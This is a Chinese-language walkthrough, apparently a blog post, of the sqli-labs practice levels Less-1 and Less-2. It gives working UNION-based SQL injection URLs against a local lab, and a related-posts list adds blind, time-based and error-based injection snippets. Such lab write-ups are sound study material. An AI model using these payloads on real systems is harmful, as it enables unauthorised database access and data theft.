安装了SQLI DUMB的题库

这些都是为了了解sql注入的方式,碰到的题目就是这样的题去找flag。现在就是去探索方法
首先我们要知道不管什么数据库注入,检测是否有注入点是第一步
第一题

1.提示输入ID,提示也有get,所以试试?id=1

我们需要闭合SQL语句,如何知道闭合符是什么。可以通过在参数后面加上单引号或者双引号使其整条SQL拼接语句失败,从而可从数据库报错信息来得知闭合符

然后发现 ’ 没有被过滤,然后可以进行
回显成功

回显失败、
所以说此处存在注入点
2.用order by判断列数

第三栏位存在,第四栏位不存在,所以说这个表只有三列
3.爆库
联合查询注入

得到数据库名称为 security

4.爆表:列出数据库所有表

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' %23四个表的名字显示出来了

5.爆列名
查看users这个表中的列名
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 'users' %23

接下来就可以查看这个列中的信息
5.查看表users各行的信息

然后发现到id=15的时候无回显,所以有十四列

第二道和第一道差不多,只是尝试在id=1后面加上’会发现被过滤掉了
所以在之后的操作中就不用再加上’了
后面的实际操作都是一样的

SQLI DUMB SERIES-1-2相关推荐

  1. SQLI DUMB SERIES-8

    SQLI DUMB SERIES-8思路 ?id=1'--+ 构造闭合发现没有回显 则我们使用盲注 盲注分为几种 布尔型盲注 Length() //返回字符串长度 Substr() //取字符串 用法 ...

  2. SQLI DUMB SERIES-10

    第十关的步骤与第九关相同 可以查看之前的第九关打法 SQLI DUMB SERIES-9 //猜库名?id=1' and if(ascii(substr(database(),1,1))=115,sl ...

  3. SQLI DUMB SERIES-2

    SQLI DUMB SERIES-2思路 ?id=-1 union all select 1,database(),3 from users --+ ?id=-1 select 1,group_con ...

  4. SQLI DUMB SERIES-4

    ?id=1" 报错 You have an error in your SQL syntax; check the manual that corresponds to your MySQL ...

  5. SQLI DUMB SERIES-5

    less5 (1)输入单引号,回显错误,说明存在注入点.输入的Id被一对单引号所包围,可以闭合单引号 (2)输入正常时:?id=1 说明没有显示位,因此不能使用联合查询了:可以使用报错注入,有两种方式 ...

  6. SQLI DUMB SERIES-16

    (1)无论怎么输入,都没有回显,但当输入 admin")#时,显示登录成功.若通过其他方法获取数据库的用户名,可通过这个方法登录成功. (2)获取其他信息可用考虑时间延迟注入.方法同15. ...

  7. SQLI DUMB SERIES-3

    ?id=1') 构造闭合 ?id=1') --+ 注释后面内容 ?id=1') order by 4–+ 4报错 3不报错 故有3列 ?id=-1') union all select 1,2,3 f ...

  8. SQLI DUMB SERIES-1

    less-1 (1) 可以看到提示输入ID,而且less-1题目也有提到GET,因此试试以下操作: http://127.0.0.1/sqli-labs-master/Less-1/?id=1 结果: ...

  9. SQLI DUMB SERIES-7

    (1)查看PHP源代码 可以看见输入的id被一对单引号和两对圆括号包围 (2)根据提示:Dump into Outfile可知,此次攻击需要导出文件 (3)在第一关获取 @@datadir 读取数据库 ...

最新文章

  1. 关于vmware 桥接 不识别无线网卡 问题解决方案
  2. 字节 字符 utf-8 unicode 以及提交表单验证字符长度 .......
  3. mysql停止服务命令_0789不停止MySQL服务重做备库的方法
  4. Dynamo:亚马逊的高可用键值存储
  5. 超600人!近5小时直播!录屏+彩蛋+PPT…你要的都在这!
  6. 为了实现自己的美好程序人生
  7. 荣耀老熊科普荣耀9X升降全面屏 一升一降皆是技术的沉淀
  8. .NET库和向后兼容的技巧——第1部分
  9. J2ME移动应用开发实战视频教程
  10. CSS(网页样式语言)基础
  11. fidder不拦截_利用Fiddler拦截接口请求并篡改数据
  12. 2019年架构软考论文押题(一)
  13. Jquery斗地主牌型验证插件 1.0版
  14. 如何在一个月内高效地备考教师资格证?
  15. 【EXLIBRIS】随笔记 004
  16. 如何跨网络远程操作另一台计算机,如何远程控制另一台电脑?
  17. 3D刷脸支付推动新零售行业发展
  18. 最佳实战 | 如何使用腾讯云微搭从0到1开发企业门户应用
  19. 使用vue中的transition标签实现点击缓慢展开,再点缓慢关闭
  20. 缺省(默认)端口参数

热门文章

  1. 我的程序员转行过程,聊聊程序员的职业出路在哪里?
  2. html5拨打电话自动录音,html5实现手机触摸出现录音以及离开停止录音并上传的功能(代码)...
  3. Electron使用sqlite3 出现install aws-sdk和_handle的解决方案!
  4. 将海康摄像机发布萤石云指南
  5. vue解决打开新窗口被拦截的的实战方法
  6. 关于对当前大学生的痛点分析
  7. java 图片相似度_GitHub - java51talk/image-similarity: 计算图片之间的相似度
  8. K-means算法的Java实现 聚类分析681个三国武将(1)
  9. 记录:COMSOL仿真——光子晶体光纤
  10. 想做出高级又好看的PPT,这8个窍门你别错过